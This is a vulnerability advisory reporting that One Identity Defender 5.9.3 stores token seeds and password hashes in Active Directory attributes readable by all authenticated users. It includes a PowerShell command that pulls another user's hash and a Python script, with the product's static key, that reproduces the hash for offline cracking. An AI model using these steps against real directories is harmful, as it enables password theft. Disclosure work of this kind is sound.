Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
===============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed with MD5 combined with a static key that serves only as obfuscation; because the key is static, the stored hash can be read from the defender-userTokenData attribute in Active Directory by any authenticated user and then used in an offline brute-force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName                     ObjectGUID                            defender-userTokenData
-----------------                     ----------                            ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local  52126f3a-723d-4b7e-a6ae-ccc2279e8618  {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
import hashlib
import uuid

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'   # the user's objectGUID
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'         # static obfuscation key

# Defender hashes the GUID in its mixed-endian byte layout (first three
# fields little-endian), the same order .NET Guid.ToByteArray() produces.
guid_bytes = uuid.UUID(guid).bytes_le

# The password is hashed as UTF-16LE, i.e. each character followed by a NUL byte.
password_bytes = password.encode('utf-16-le')

# Stored value = MD5(static key || UTF-16LE password || GUID bytes)
digest = hashlib.md5(bytes.fromhex(key) + password_bytes + guid_bytes).hexdigest()
print(digest)

[duras@qonos ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5

Contact:
========
spicyitalian[at]protonmail[dot]com